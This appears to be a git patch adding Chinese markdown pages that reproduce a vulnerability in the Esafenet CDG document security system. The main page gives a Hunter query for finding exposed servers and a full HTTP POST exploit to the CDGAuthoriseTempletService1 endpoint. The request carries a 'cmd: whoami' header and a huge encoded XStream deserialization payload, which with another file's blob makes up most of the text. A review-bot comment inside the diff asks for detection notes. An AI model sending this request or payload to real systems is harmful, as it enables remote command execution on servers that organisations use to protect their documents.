CFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECAL
MLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCP
OCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEO
LIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLC
LJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605008893-3649fb98-cab2-497c-953b-45f362a07527.png](./img/tK-eUSHk6FfLxBID/1706605008893-3649fb98-cab2-497c-953b-45f362a07527-559003.png) + + + +> 更新: 2024-04-20 22:01:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mfx9qpu6zsf9hfxv> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..9a68c0d --- /dev/null 
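Review bot: the body between the fences is an unexplained blob made only of the letters A through P; the hunk says nothing about what it encodes, how it was produced, or what a defender should look for, and the footer records only an update timestamp and a yuque source link. At minimum the document should describe what the blob is and add a detection note keyed on the request shape (endpoint, content type and the custom header it is sent with) so the page is usable by the people who have to defend the product, not only reproduce against it. The file also ends without a trailing newline (`\ No newline at end of file`), as do the neighbouring files in this patch.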
+++ b/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/af7dsU7CiKjv9PIM/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-986219.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPB
DMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOK
JMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPO
LIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKI